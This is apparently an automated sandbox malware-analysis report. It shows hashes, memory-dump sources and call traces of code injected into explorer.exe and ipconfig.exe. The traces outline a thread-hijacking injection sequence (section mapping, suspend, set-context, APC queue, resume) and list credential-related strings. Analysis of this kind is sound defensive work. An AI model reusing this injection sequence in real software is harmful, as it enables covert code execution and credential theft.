                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction ID: 1d006516e93bab5d39e7690aac9b8320f8442ee684592b878dc0ea012cf321a1
                                                                                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction Fuzzy Hash: 6B31AD74118B088FC784DF289495BAAB7E1FF98300F84563DA44ACF255CF30D941C742
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction ID: 6be422302a09b610c164d7c5382d9fca05496ec9430e8138196e908875c96b43
                                                                                                                              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                              • Instruction Fuzzy Hash: EC317C7411CB088FC784DF6C8495BAAB7E1FF98200F84466EA44ACB259DF30D945CB96
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 0-319646191
                                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction ID: 9b9291f38857baf144265da19679f1ec5fa2e5288cfabe2d255934ad1c91ac80
                                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction Fuzzy Hash: 7F31DF31614A4C8BCF44EFA8D885BEEB7E1FB58215F40022AE45EDB241DE789645C789
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 0-319646191
                                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction ID: 3c9be2fd7db5ec61cf9b4839c728999ff510c57ff3d19afa8dfc3458ca1d4875
                                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction Fuzzy Hash: 4231DF31618A0D8BCF44EFA8C8857EEBBE0FB58204F40422BE44ED7240EE789645C799
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
Similarity
• API ID:
• String ID: auth$logi$pass$user
• API String ID: 0-2393853802
Strings
Memory Dump Source
• Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
Similarity
• API ID:
• String ID: auth$logi$pass$user
• API String ID: 0-2393853802

Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 621
Total number of Limit Nodes: 75
LdrInitializeThunk 103937->103940 103938 e3f344 103938->103930 103940->103938 103942 e3b2aa 103941->103942 103943 e3b030 LdrLoadDll 103942->103943 103944 e3b303 103943->103944 103944->103867 103946 e3d317 103945->103946 103954 e3f700 103946->103954 103950 e3d38b 103951 e3d392 103950->103951 103965 e4a260 LdrLoadDll 103950->103965 103951->103891 103953 e3d3a5 103953->103891 103955 e3f725 103954->103955 103966 e381a0 103955->103966 103957 e3d35f 103962 e4a6a0 103957->103962 103958 e44a40 8 API calls 103960 e3f749 103958->103960 103960->103957 103960->103958 103961 e4bd80 2 API calls 103960->103961 103973 e3f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 103960->103973 103961->103960 103963 e4af20 LdrLoadDll 103962->103963 103964 e4a6bf CreateProcessInternalW 103963->103964 103964->103950 103965->103953 103967 e3829f 103966->103967 103968 e381b5 103966->103968 103967->103960 103968->103967 103969 e44a40 8 API calls 103968->103969 103970 e38222 103969->103970 103971 e4bd80 2 API calls 103970->103971 103972 e38249 103970->103972 103971->103972 103972->103960 103973->103960 103975 e44e40 LdrLoadDll 103974->103975 103976 e3f6df 103975->103976 103977 e3f6e6 SetErrorMode 103976->103977 103978 e3f6ed 103976->103978 103977->103978 103978->103905 103981 e443b6 103979->103981 103992 e3f490 103979->103992 103981->103907 103983 e4bd00 LdrLoadDll 103982->103983 103986 e38ad5 103982->103986 103983->103986 103984 e38cea 103984->103910 103986->103984 104011 e49840 103986->104011 103988 e3f673 103987->103988 104059 e49e50 103988->104059 103991->103914 103993 e3f4ad 103992->103993 103999 e49f80 103993->103999 103995 e3f4f5 103995->103981 104000 e4af20 LdrLoadDll 103999->104000 104001 e49f9c 104000->104001 104009 38a2f30 LdrInitializeThunk 104001->104009 104002 e3f4ee 104002->103995 104004 e49fd0 104002->104004 104005 e4af20 LdrLoadDll 104004->104005 104006 e49fec 104005->104006 104010 38a2d10 LdrInitializeThunk 104006->104010 104007 e3f51e 104007->103981 104009->104002 
104010->104007 104012 e4bf50 2 API calls 104011->104012 104013 e49857 104012->104013 104032 e39310 104013->104032 104015 e49872 104016 e498b0 104015->104016 104017 e49899 104015->104017 104020 e4bd00 LdrLoadDll 104016->104020 104018 e4bd80 2 API calls 104017->104018 104019 e498a6 104018->104019 104019->103984 104021 e498ea 104020->104021 104022 e4bd00 LdrLoadDll 104021->104022 104023 e49903 104022->104023 104027 e49ba4 104023->104027 104038 e4bd40 LdrLoadDll 104023->104038 104025 e49b89 104026 e49b90 104025->104026 104025->104027 104028 e4bd80 2 API calls 104026->104028 104030 e4bd80 2 API calls 104027->104030 104029 e49b9a 104028->104029 104029->103984 104031 e49bf9 104030->104031 104031->103984 104033 e39335 104032->104033 104034 e3ace0 LdrLoadDll 104033->104034 104035 e39368 104034->104035 104037 e3938d 104035->104037 104039 e3cf10 104035->104039 104037->104015 104038->104025 104040 e3cf3c 104039->104040 104041 e4a1a0 LdrLoadDll 104040->104041 104042 e3cf55 104041->104042 104043 e3cf5c 104042->104043 104044 e3cf7f 104042->104044 104050 e4a1e0 104042->104050 104043->104037 104044->104043 104055 e4a7d0 104044->104055 104047 e3cf97 104048 e4a450 2 API calls 104047->104048 104049 e3cfba 104048->104049 104049->104037 104051 e4af20 LdrLoadDll 104050->104051 104052 e4a1fc 104051->104052 104058 38a2ca0 LdrInitializeThunk 104052->104058 104053 e4a217 104053->104044 104056 e4af20 LdrLoadDll 104055->104056 104057 e4a7ef 104056->104057 104057->104047 104058->104053 104060 e49e6c 104059->104060 104061 e4af20 LdrLoadDll 104059->104061 104064 38a2dd0 LdrInitializeThunk 104060->104064 104061->104060 104062 e3f69e 104062->103914 104064->104062 104065 38a2ad0 LdrInitializeThunk 104068 369cb84 104071 369a042 104068->104071 104070 369cba5 104073 369a06b 104071->104073 104072 369a56c 104072->104070 104073->104072 104074 369a182 NtQueryInformationProcess 104073->104074 104076 369a1ba 104074->104076 104075 369a1ef 104075->104070 104076->104075 104077 369a2db 104076->104077 104078 
369a290 104076->104078 104079 369a2fc NtSuspendThread 104077->104079 104100 3699de2 NtCreateSection NtMapViewOfSection NtClose 104078->104100 104081 369a30d 104079->104081 104083 369a331 104079->104083 104081->104070 104082 369a2cf 104082->104070 104086 369a412 104083->104086 104091 3699bb2 104083->104091 104085 369a531 104088 369a552 NtResumeThread 104085->104088 104086->104085 104087 369a4a6 NtSetContextThread 104086->104087 104090 369a4bd 104087->104090 104088->104072 104089 369a51c NtQueueApcThread 104089->104085 104090->104085 104090->104089 104092 3699bf7 104091->104092 104093 3699c66 NtCreateSection 104092->104093 104094 3699d4e 104093->104094 104095 3699ca0 104093->104095 104094->104086 104096 3699cc1 NtMapViewOfSection 104095->104096 104096->104094 104097 3699d0c 104096->104097 104097->104094 104098 3699d88 104097->104098 104099 3699dc5 NtClose 104098->104099 104099->104086 104100->104082

Control-flow Graph (rendered image; not recoverable)

APIs
• NtQueryInformationProcess.NTDLL ref: 0369A19F
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: 02f70afb98b8649c7c3c0c28981044d3ab3744c67d536167417b8e21547a6caa
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: DCF15F74528A8C8FDFA5EF68C894AEEB7E4FB98304F40462ED44ACB250DF349645CB45

Control-flow Graph (rendered image; edge list omitted). Legend: Executed / Not Executed. Basic blocks 3699baf-3699ddc; calls 3699102, 369b942 (x2), NtCreateSection, NtMapViewOfSection, 3699172, 369cd62, NtClose.

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: fde9c1b17f3c41a76f4aeafe862ce4e02b37acf000651b5a22428e73e52ca045
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: E2619070218B088FDB58EF68D8856AABBE4FF98314F50062EE58AC3251DF35D441CB86

Control-flow Graph (rendered image; edge list omitted). Legend: Executed / Not Executed. Basic blocks 3699bb2-3699ddc; calls 3699102, 369b942 (x2), NtCreateSection, NtMapViewOfSection, 3699172, 369cd62, NtClose.

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
Similarity
• API ID: Section$CreateView
• String ID: @$@
• API String ID: 1585966358-149943524
• Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction ID: d2c49428a54c5c447b5f059778b9e0615ec354cca319d4a895112981782f87d9
• Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction Fuzzy Hash: 64517EB0618B088FDB58DF58D8956AABBE4FF88314F50062EE98EC3651DF35D441CB86

Control-flow Graph (rendered image; not recoverable)

APIs
• NtQueryInformationProcess.NTDLL ref: 0369A19F
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000822504.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3690000_ipconfig.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: 0975f5601fb7e297412e13654819b81c3e5b9b5a6f94ad5601251c9b5624fb38
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: 1B514E70914A9C8FEB69EF68C8946EEBBF4FB98304F40462ED44AD7210DF309645CB45

Control-flow Graph (rendered image; edge list omitted). Legend: Executed / Not Executed. Basic blocks e4a31b-e4a371; calls e4af20, NtCreateFile.

APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00E44BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E44BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00E4A36D
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: d194b2b644b6ee93909844aef6977279dfd455d3e787a638be09d029667fb717
• Instruction ID: 274a5cfb523537d534d6f282c627ec2a10455b43d536d79c347b8029a339690e
• Opcode Fuzzy Hash: d194b2b644b6ee93909844aef6977279dfd455d3e787a638be09d029667fb717
• Instruction Fuzzy Hash: E401D2B2200108BFCB08CF98D895DEB77A9BF8C354F158208BA0993241C630E8118BA4

Control-flow Graph (rendered image; edge list omitted). Legend: Executed / Not Executed. Basic blocks e4a320-e4a371; calls e4af20, NtCreateFile.

APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00E44BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E44BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00E4A36D
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: c22f747b6e4e1dc8fd10d28f79362019ea44ec1f551b0a88b15699ea667f9f31
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: 41F0B2B2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA1D97241C630E8118BA4

Control-flow Graph (rendered image; edge list omitted). Legend: Executed / Not Executed. Basic blocks e4a3d0-e4a419; calls e4af20, NtReadFile.

APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 00E4A415
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: !J
• API String ID: 2738559852-3122242347
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: 264d6a5ae43e12a5228cd1046577c498caba09851ae8a5dfcab73a135aac8130
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: 94F0A4B2200208ABDB14DF89DC81EEB77ADAF8C754F158258BE1DA7241D630E8118BA0
APIs
• NtClose.NTDLL(@M,?,?,00E44D40,00000000,FFFFFFFF), ref: 00E4A475
Strings
Memory Dump Source
• Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
Yara matches
Similarity
• API ID: Close
• String ID: @M
• API String ID: 3535843008-2208089455
• Opcode ID: e3abb0435320054c825172b2a0ebe16571dec310279e1de4bb39d7c27006568e
• Instruction ID: 7fa1389d33dbae3615873085694793c97ded50e14b34702bdbfd8938dd195e5f
                                                                                                                              • Opcode Fuzzy Hash: e3abb0435320054c825172b2a0ebe16571dec310279e1de4bb39d7c27006568e
                                                                                                                              • Instruction Fuzzy Hash: 10E08C77240210ABD710EBE49C45ED73BA8EF48624F1945A4BA589B352C234E90087D0
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(@M,?,?,00E44D40,00000000,FFFFFFFF), ref: 00E4A475
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID: @M
                                                                                                                              • API String ID: 3535843008-2208089455
                                                                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                              • Instruction ID: 6190430b811e9570b4bd097042426eaf4567d6dc3e89981d76ca2d81c69ab211
                                                                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                              • Instruction Fuzzy Hash: EDD01776240214ABE710EB98DC85EA77BADEF48760F1544A9BA18AB242C530FA0086E0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4c858d9654a708a0cceac675ca7bf1146cf770cb5a4bc4efdb7c410acebd4a74
                                                                                                                              • Instruction ID: 019c52b94ad70aa093d01cb5f9f7c238fa37d62f7859816e72cd6b674375bb7d
                                                                                                                              • Opcode Fuzzy Hash: 4c858d9654a708a0cceac675ca7bf1146cf770cb5a4bc4efdb7c410acebd4a74
                                                                                                                              • Instruction Fuzzy Hash: 35900261202445478105B1984814656401E87E0201B65D061E20195A0DC62589996526
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: e5ad8adabc0ac67c84d1ce0c1adb875f825e9ef5e14cad027ba02944de3745f3
                                                                                                                              • Instruction ID: 9658305635c94dc342e1cd9b6a960e92dc49fd523c4f0da0195c8143c5140b3f
                                                                                                                              • Opcode Fuzzy Hash: e5ad8adabc0ac67c84d1ce0c1adb875f825e9ef5e14cad027ba02944de3745f3
                                                                                                                              • Instruction Fuzzy Hash: FE900225211445474105F5980B04547005A87D5351365D061F201A560CD72189695522
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 959d3b27e3b0eef449be1277cac262862a1258d371a001cc4e2b3de79e32edeb
                                                                                                                              • Instruction ID: f63585b79fb926cc35c75be32371d46d38fdcc38fc758317c743b0225bcb9d4b
                                                                                                                              • Opcode Fuzzy Hash: 959d3b27e3b0eef449be1277cac262862a1258d371a001cc4e2b3de79e32edeb
                                                                                                                              • Instruction Fuzzy Hash: F5900221211C4586D200B5A84C14B47001987D0303F65D155A1159564CCA1589695922
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5033b06c75cacdce209ebb307de911bff9c761b91f12973e240a9a8755291120
                                                                                                                              • Instruction ID: 791bb5cf3cbaf4049c5418443a73ec1f8de52b7eb3fc176ce9d414aa23944820
                                                                                                                              • Opcode Fuzzy Hash: 5033b06c75cacdce209ebb307de911bff9c761b91f12973e240a9a8755291120
                                                                                                                              • Instruction Fuzzy Hash: 9D90026134144986D100B1984814B460019C7E1301F65D055E2069564D8719CD5A6527
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 34460ca5752512d7ac4cb72784eae9a671077b34f4e1afb3cc2cd02051f69331
                                                                                                                              • Instruction ID: a8079b7eed8f089bfc105e02fab1502e6d28b13a455d15e830f0e2ba66f6aad9
                                                                                                                              • Opcode Fuzzy Hash: 34460ca5752512d7ac4cb72784eae9a671077b34f4e1afb3cc2cd02051f69331
                                                                                                                              • Instruction Fuzzy Hash: 1E90027120144946D140B1984804786001987D0301F65D051A6069564E87598EDD6A66
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d4c581f28ddadb6ce75f135404f266fea7f383a6c22666d533db88f701399b73
                                                                                                                              • Instruction ID: 6965cebe132cc1cc79cf203f5fe6f8d63f82c3874abb1c7ecf3f23b48d54494f
                                                                                                                              • Opcode Fuzzy Hash: d4c581f28ddadb6ce75f135404f266fea7f383a6c22666d533db88f701399b73
                                                                                                                              • Instruction Fuzzy Hash: FA900221242486969545F1984804547401A97E02417A5D052A2419960C8626995EDA22
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: bcf61dbb757811e9cff7328af3eaa6ea3e93a9749d5585355606e9012ea6d924
                                                                                                                              • Instruction ID: 9c049891fc540308bc962f1acf4ccf67b96eb9840e1d6d66e2e39fee77818217
                                                                                                                              • Opcode Fuzzy Hash: bcf61dbb757811e9cff7328af3eaa6ea3e93a9749d5585355606e9012ea6d924
                                                                                                                              • Instruction Fuzzy Hash: 7390023120144957D111B1984904747001D87D0241FA5D452A1429568D97568A5AA522
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
